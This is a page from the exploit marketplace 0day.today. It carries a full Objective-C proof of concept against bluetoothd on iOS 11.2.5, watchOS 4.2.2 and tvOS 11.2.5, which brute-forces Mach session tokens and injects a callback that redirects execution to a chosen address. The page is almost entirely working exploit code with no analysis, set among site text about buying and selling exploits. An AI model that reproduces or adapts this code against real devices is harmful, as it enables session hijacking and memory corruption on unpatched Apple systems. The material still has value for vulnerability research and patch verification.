0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - bluetoothd Memory Corruption Exploit
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
//
// main.m
// bluetoothdPoC
//
// Created by Rani Idan.
// Copyright © 2018 zLabs. All rights reserved.
//
#import "AppDelegate.h"
#include <mach/mach.h>
extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);
/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
#define CALLBACK_ADDRESS 0xdeadbeef
#define CALLBACK_ADDITIONAL_DATA 0x13371337
#define BLUETOOTHD_CONST 0xFA300
#define BLUETOOTHD_WRONG_TOKEN 7
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
#define BLUETOOTHD_MIG_SERVER_NAME "com.apple.server.bluetooth"
#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40
typedef unsigned int mach_msg_return_value;
mach_port_t get_service_port(char *service_name)
{
kern_return_t ret = KERN_SUCCESS;
mach_port_t service_port = MACH_PORT_NULL;
mach_port_t bs = MACH_PORT_NULL;
ret = task_get_bootstrap_port(mach_task_self(), &bs);
ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
if (ret)
{
NSLog(@"Couldn't find port for %s",service_name);
return MACH_PORT_NULL;
}
NSLog(@"Got port: %x", service_port);
mach_port_deallocate(mach_task_self(), bs);
return service_port;
}
mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
{
mach_port_t receive_port = MACH_PORT_NULL;
mach_msg_header_t * message = NULL;
char *data = NULL;
kern_return_t ret = KERN_SUCCESS;
mach_msg_return_value return_value = 0;
mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
mach_msg_size_t msg_size = MAX(recv_size, send_size);
ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@"Failed to allocate port ret=%x", ret);
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
goto cleanup;
}
ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@"Failed to insert port right ret=%x", ret);
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
goto cleanup;
}
message = malloc(msg_size);
data = (char *)message;
memset(message, 0, msg_size);
*((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
*((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
*((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;
message->msgh_bits = 0x1513 ;
message->msgh_remote_port = bluetoothd_port; /* Request port */
message->msgh_local_port = receive_port; /* Reply port */
message->msgh_size = send_size; /* Message size */
message->msgh_reserved = 0;
message->msgh_id = BLUETOOTHD_CONST + msgh_id;
ret = mach_msg(message, /* The header */
options, /* Flags */
send_size, /* Send size */
recv_size, /* Max receive Size */
receive_port, /* Receive port */
BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT, /* No timeout */
MACH_PORT_NULL); /* No notification */
if(MACH_MSG_SUCCESS == ret)
{
return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
if (return_value != BLUETOOTHD_WRONG_TOKEN) {
NSLog(@"Sent message id %d with token %x, returned: %x", msgh_id, session_token, return_value);
}
} else if (MACH_RCV_INVALID_NAME == ret)
{
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
NSLog(@"mach_error_int: ret=%x", ret);
NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
return_value = -2;
}
else {
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
NSLog(@"mach_error_int: ret=%x", ret);
NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
return_value = -1;
}
cleanup:
if(MACH_PORT_NULL != receive_port)
{
mach_port_destroy(mach_task_self(), receive_port);
}
if (NULL != message) {
free(message);
}
return return_value;
}
void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
{
int ports_found[0xffff] = {0};
int number_of_ports_found = 0;
mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
if (MACH_PORT_NULL == bluetoothd_port)
{
NSLog(@"Couldn't have bluetoothd port");
return;
}
NSLog(@"Starting to look for session tokens");
for (int i = 0; i <= 0xffff; i++) {
int id = 0;
id = (i << 16) + 1;
int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
id = (i << 16) + 2;
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
id = (i << 16);
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
}
for (int i = number_of_ports_found-1; i>=0; i--) {
NSLog(@"Adding callback: Port=%x address=%x value=%x", ports_found[i], (unsigned int)address, (unsigned int)value);
BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
}
NSLog(@"Done");
return;
}
void trigger() {
try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
}
int main(int argc, char * argv[]) {
trigger();
}
# 0day.today [2024-11-14] #